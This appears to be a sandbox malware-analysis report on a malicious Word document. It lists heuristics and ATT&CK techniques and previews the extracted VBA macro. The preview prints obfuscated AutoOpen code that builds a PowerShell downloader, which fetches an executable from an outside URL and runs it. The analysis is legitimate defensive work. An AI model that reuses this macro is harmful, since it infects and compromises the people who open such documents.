MALICIOUS
82
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is designed to execute a shell command, likely to download and run a second-stage payload. The obfuscated nature of the script and lack of clear indicators prevent definitive family attribution.
Heuristics 4
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4699 bytes |
SHA-256: 60b71e064a16fd3708e75236714c483e2efb4b5db525229e5612282789e1cf82 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "EqGaisUUUhjoRu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const EBQEXlZG = 0
Dim SOuBjD(5)
SOuBjD(0) = Left(RzNihfl, 96)
SOuBjD(1) = Mid(pmIGtHHh, 607, 476)
SOuBjD(2) = Right(nizQpiWD, 701)
SOuBjD(3) = Right(nizQpiWD, 701)
SOuBjD(4) = Left(RzNihfl, 96)
Dim aZbiz(5)
aZbiz(0) = Mid(pmIGtHHh, 607, 476)
aZbiz(1) = MidB(IohwPYE, 228, 409)
aZbiz(2) = MidB(IohwPYE, 228, 409)
aZbiz(3) = Left(RzNihfl, 96)
aZbiz(4) = Mid(pmIGtHHh, 607, 476)
Dim hdVXv(5)
hdVXv(0) = Left(RzNihfl, 96)
hdVXv(1) = Mid(pmIGtHHh, 607, 476)
hdVXv(2) = Left(RzNihfl, 96)
hdVXv(3) = Mid(pmIGtHHh, 607, 476)
hdVXv(4) = Left(RzNihfl, 96)
Dim hdqwO(4)
hdqwO(0) = MidB(IohwPYE, 228, 409)
hdqwO(1) = Mid(pmIGtHHh, 607, 476)
hdqwO(2) = Mid(pmIGtHHh, 607, 476)
hdqwO(3) = Right(nizQpiWD, 701)
Dim VuVbFY(5)
VuVbFY(0) = MidB(IohwPYE, 228, 409)
VuVbFY(1) = Left(RzNihfl, 96)
VuVbFY(2) = Left(RzNihfl, 96)
VuVbFY(3) = Left(RzNihfl, 96)
VuVbFY(4) = Mid(pmIGtHHh, 607, 476)
Dim EKzlw(2)
EKzlw(0) = Left(RzNihfl, 96)
EKzlw(1) = MidB(IohwPYE, 228, 409)
Dim zVLUVt(2)
zVLUVt(0) = MidB(IohwPYE, 228, 409)
zVLUVt(1) = Right(nizQpiWD, 701)
Shell@ OPanWpST + iKszJaRiXO + jSqqvIwbmarHi, CInt(EBQEXlZG)
Dim HndoLU(2)
HndoLU(0) = MidB(IohwPYE, 228, 409)
HndoLU(1) = Left(RzNihfl, 96)
Dim ksZGq(5)
ksZGq(0) = Mid(pmIGtHHh, 607, 476)
ksZGq(1) = Right(nizQpiWD, 701)
ksZGq(2) = Left(RzNihfl, 96)
ksZGq(3) = MidB(IohwPYE, 228, 409)
ksZGq(4) = MidB(IohwPYE, 228, 409)
End Sub
Attribute VB_Name = "hKjINDUialRTk"
Function OPanWpST()
Dim pjHfHG(2)
pjHfHG(0) = Mid(pmIGtHHh, 607, 476)
pjHfHG(1) = Mid(pmIGtHHh, 607, 476)
Dim uUPMlM(4)
uUPMlM(0) = MidB(IohwPYE, 228, 409)
uUPMlM(1) = MidB(IohwPYE, 228, 409)
uUPMlM(2) = Left(RzNihfl, 96)
uUPMlM(3) = Left(RzNihfl, 96)
KKtjM = Format(Chr(4 + 14 + 14 + 9 + 58)) + "md /V" + "/" + Format(Chr(3 + 9 + 10 + 6 + 39)) + Format(Chr(1 + 4 + 4 + 2 + 23)) + "^se^t" + " ^8^y^au= " + "^ ^ ^ ^ ^ ^ ^ " + "^ ^}}^{h" + Format(Chr(4 + 14 + 14 + 9 + 58)) + "ta" + Format(Chr(4 + 14 + 14 + 9 + 58)) + "}" + ";^kaerb;^k^PM$^ ^m^e^tI-e^k^ov" + "nI;)^k^P^M^" + "$ ,n^Qf$(^e^" + "l^i^F^d^ao^ln^woD^.^J^iY^$^"
Dim cIDVPX(4)
cIDVPX(0) = Left(RzNihfl, 96)
cIDVPX(1) = MidB(IohwPYE, 228, 409)
cIDVPX(2) = Left(RzNihfl, 96)
cIDVPX(3) = Mid(pmIGtHHh, 607, 476)
Dim XMbWcE(2)
XMbWcE(0) = Left(RzNihfl, 96)
XMbWcE(1) = Right(nizQpiWD, 701)
QciSBdhlW = "{yr^t^{)IB" + Format(Chr(3 + 9 + 10 + 6 + 39)) + "^$ ni^ n^Q^f^$(^h" + Format(Chr(4 + 14 + 14 + 9 + 58)) + "^a^ero^f" + ";'ex^e.^'^+^YZ^h$^+'^\'^+" + Format(Chr(4 + 14 + 14 + 9 + 58)) + "^ilb^up:vne^$^=^k^P^M^$;^'8" + "^69'^ =^ ^Y^Zh$^;)'@'(^ti^lpS." + "^'^sap^.6^x^a^m" + "^ak=l?^" + "php.fmiren/B^A^D/^mo" + Format(Chr(4 + 14 + 14 + 9 + 58)) + "^.ojps" + "^o^e^in" + "^av//:^ptt^h'=IB" + Format(Chr(3 + 9 + 10 + 6 + 39)) + "^$^;tne^i^" + "l" + Format(Chr(3 + 9 + 10 + 6 + 39)) + "^b^eW.^teN "
Dim lirkS(4)
lirkS(0) = Right(nizQpiWD, 701)
lirkS(1) = MidB(IohwPYE, 228, 409)
lirkS(2) = Mid(pmIGtHHh, 607, 476)
lirkS(3) = Right(nizQpiWD, 701)
mVhpNG = "t" + Format(Chr(4 + 14 + 14 + 9 + 58)) + "^ej^bo^-wen^=J" + "iY$ llehsrew^op&&" + "^f^or /^L %S ^in " + "(^259;-^1^;0)^d^o" + " ^se^t ^L^FY" + "=!^L^FY!"
Dim mziAzU(4)
mziAzU(0) = Right(nizQpiWD, 701)
mziAzU(1) = Mid(pmIGtHHh, 607, 476)
mziAzU(2) = Right(nizQpiWD, 701)
mziAzU(3) = Mid(pmIGtHHh, 607, 476)
Dim kKoIEW(5)
kKoIEW(0) = Left(RzNihfl, 96)
kKoIEW(1) = Right(nizQpiWD, 701)
kKoIEW(2) = Mid(pmIGtHHh, 607, 476)
kKoIEW(3) = MidB(IohwPYE, 228, 409)
kKoIEW(4) = Left(RzNihfl, 96)
Dim LwAkM(4)
LwAkM(0) = Left(RzNihfl, 96)
LwAkM(1) = Left(RzNihfl, 96)
LwAkM(2) = Mid(pmIGtHHh, 607, 476)
LwAkM(3) = Mid(pmIGtHHh, 607, 476)
YwSkUNNic = "!^8^y^au:~%S,1!&&^if %S==^" + "0 " + Format(Chr(4 + 14 + 14 + 9 + 58)) + "^a^l^l %^L^FY:*^LFY^!^=%" + Format(
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.